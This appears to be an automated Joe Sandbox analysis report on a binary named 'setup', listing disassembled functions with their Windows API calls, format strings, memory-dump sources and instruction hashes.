                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClassInfo$CursorH_prolog3_catchLoad
                                                                                                                          • String ID: MultiDataViewCtrl
                                                                                                                          • API String ID: 1472851987-1429961936
                                                                                                                          • Opcode ID: bf0895b24573921f86288646367e63871636912152065bb289b5dd876dcc21ee
                                                                                                                          • Instruction ID: 12a4863b755b2e90562be498fb946fd7c248de124a90aadd3ae330bbe6eb3c11
                                                                                                                          • Opcode Fuzzy Hash: bf0895b24573921f86288646367e63871636912152065bb289b5dd876dcc21ee
                                                                                                                          • Instruction Fuzzy Hash: 4A0171B1C00219DFCB00DFEAD885AEEBBFCAF59304F00006AE500B7251D7759A429BA5
                                                                                                                          Function 00C197E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C19810
                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00C19875
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExecuteFileModuleNameShell
                                                                                                                          • String ID: <
                                                                                                                          • API String ID: 1703432166-4251816714
                                                                                                                          • Opcode ID: 101a0815d211058492a6a47847c13740f93d616039b7fafc5a10e15e7f067159
                                                                                                                          • Instruction ID: 92d518c3532d791cf5d4a53a4b4e07b1d845f5676e4ffb913873006f7e75bb6a
                                                                                                                          • Opcode Fuzzy Hash: 101a0815d211058492a6a47847c13740f93d616039b7fafc5a10e15e7f067159
                                                                                                                          • Instruction Fuzzy Hash: 7411F7B09012289BDB20DF55D88CA9DBBB4FB45318F6006EED419A7250DB74AE88CF50
                                                                                                                          Function 00C39908 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00C3992C
                                                                                                                          • PathFindExtensionW.SHLWAPI(?), ref: 00C39942
                                                                                                                            • Part of subcall function 00C393EE: __EH_prolog3_GS.LIBCMT ref: 00C393F8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExtensionFileFindH_prolog3_ModuleNamePath
                                                                                                                          • String ID: %Ts%Ts.dll
                                                                                                                          • API String ID: 3433622546-1896370695
                                                                                                                          • Opcode ID: 6b88e4d2d6fe4f8998fe96c1054a2ea0e819213631d51a7748c691a394468ed8
                                                                                                                          • Instruction ID: 971e7e3e2570d2262719ac1f87a63a63952f34e501ee2f5df4f18aa5f9cf7faa
                                                                                                                          • Opcode Fuzzy Hash: 6b88e4d2d6fe4f8998fe96c1054a2ea0e819213631d51a7748c691a394468ed8
                                                                                                                          • Instruction Fuzzy Hash: 48018672910119ABCB11EBA4ED49BEF73FCFF08710F01046AE515E7150EA709A05DB90
                                                                                                                          Function 00C27290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C27297
                                                                                                                            • Part of subcall function 00C038F1: _Deallocate.LIBCONCRT ref: 00C03906
                                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 00C27302
                                                                                                                          Strings
                                                                                                                          • Call "%s" , Failed with error code : %d, xrefs: 00C272CA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DeallocateH_prolog3_MessagePost
                                                                                                                          • String ID: Call "%s" , Failed with error code : %d
                                                                                                                          • API String ID: 1991094443-1019062125
                                                                                                                          • Opcode ID: 662412ce0d75ef73a7e6005d731cdfee580d5f8152f044b45cb207ad1f2cf778
                                                                                                                          • Instruction ID: d7b8cb1b84bf805b7d8167b1dd54e022dbb0143cc13b74273118b141d94a06da
                                                                                                                          • Opcode Fuzzy Hash: 662412ce0d75ef73a7e6005d731cdfee580d5f8152f044b45cb207ad1f2cf778
                                                                                                                          • Instruction Fuzzy Hash: E4015EB2800614DFCB11EFA4C845DDEBBB8BF18310F444A19F485A7461DB30EA05EB60
                                                                                                                          Function 00C02732 Relevance: 5.1, APIs: 4, Instructions: 141COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C02761
                                                                                                                          • GetLastError.KERNEL32 ref: 00C02776
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452528299-0
                                                                                                                          • Opcode ID: 54fef0c68209b77fb327a1c90cb90152e81e400989140db4c7aa067aa38063e9
                                                                                                                          • Instruction ID: afd8e1305f1aad7ea7cd724deeea52053df475813ff33c6017db7f5c1fbfea30
                                                                                                                          • Opcode Fuzzy Hash: 54fef0c68209b77fb327a1c90cb90152e81e400989140db4c7aa067aa38063e9
                                                                                                                          • Instruction Fuzzy Hash: 5D516C39600302ABDB18DFA5C898FAABBB5FF44305F14C55CE4669B2D1DB31EA44DB50
                                                                                                                          Function 00C26819 Relevance: 5.1, APIs: 4, Instructions: 96stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • lstrlenW.KERNEL32(?,00000000,?,00000000,00C28512,?,?,?,?,?,00000000), ref: 00C26862
                                                                                                                          • lstrlenW.KERNEL32(?,?,?), ref: 00C26881
                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 00C268A9
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000), ref: 00C268B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1659193697-0
                                                                                                                          • Opcode ID: ac5e6dc05b1f20148ab2aa02e061eaebb8138cb00ad044b81f232e847dc95b7c
                                                                                                                          • Instruction ID: 2f451937bc545649f676b8505924a077d4fa039a86fe9ead3958fe14c2f2e46a
                                                                                                                          • Opcode Fuzzy Hash: ac5e6dc05b1f20148ab2aa02e061eaebb8138cb00ad044b81f232e847dc95b7c
                                                                                                                          • Instruction Fuzzy Hash: F8213671A00220AF9724EB68EC8687EB7ECEF48314710052EF552DB681EE30EE01D7B1
                                                                                                                          Function 00C3E27D Relevance: 5.1, APIs: 4, Instructions: 80COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(00CC39E0,00CC39C4,00000000,00CC39E0), ref: 00C3E2FD
                                                                                                                          • LeaveCriticalSection.KERNEL32(00CC39E0,?), ref: 00C3E313
                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00C3E31B
                                                                                                                          • TlsSetValue.KERNEL32(?,00000000), ref: 00C3E33A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2949335588-0
                                                                                                                          • Opcode ID: 487342304488ca8ce38664929b7bda275b65f830eadab43b89c2f1f9f9c94382
                                                                                                                          • Instruction ID: 0fade18065d08bae64bb8b4a3d6d2aae9cd517ee096ce72ed24594f9b4694668
                                                                                                                          • Opcode Fuzzy Hash: 487342304488ca8ce38664929b7bda275b65f830eadab43b89c2f1f9f9c94382
                                                                                                                          • Instruction Fuzzy Hash: B2312A35A10129EFCB05DF98C884BAD77B5FF89354F1440A6E901AB2A1DB31EE41CF91
                                                                                                                          Function 00C3E51D Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • EnterCriticalSection.KERNEL32(00CC39E0,?,?,00000000,?,00C3E519,00000000,00000004,00C34F41,00C2DD73,00C2DF03,00C083FC,00000000,?,?,00C0842C), ref: 00C3E529
                                                                                                                          • TlsGetValue.KERNEL32(00CC39C4,?,?,00000000,?,00C3E519,00000000,00000004,00C34F41,00C2DD73,00C2DF03,00C083FC,00000000,?,?,00C0842C), ref: 00C3E53D
                                                                                                                          • LeaveCriticalSection.KERNEL32(00CC39E0,?,?,00000000,?,00C3E519,00000000,00000004,00C34F41,00C2DD73,00C2DF03,00C083FC,00000000,?,?,00C0842C), ref: 00C3E557
                                                                                                                          • LeaveCriticalSection.KERNEL32(00CC39E0,?,?,00000000,?,00C3E519,00000000,00000004,00C34F41,00C2DD73,00C2DF03,00C083FC,00000000,?,?,00C0842C), ref: 00C3E562
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$Leave$EnterValue
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3969253408-0
                                                                                                                          • Opcode ID: dad87205c7d7648a338d36c30429ff41866e31df5c8eebb1dc980022c761451e
                                                                                                                          • Instruction ID: d7c9855bd308be7621a4630bbd4cd21fc71deb3c0ff8dc3d5efa963b1b47dc64
                                                                                                                          • Opcode Fuzzy Hash: dad87205c7d7648a338d36c30429ff41866e31df5c8eebb1dc980022c761451e
                                                                                                                          • Instruction Fuzzy Hash: 04F0BE32210214ABCB10DF25DC88A7EB768FE047A9B095426E85AA71A2D731EC058BA0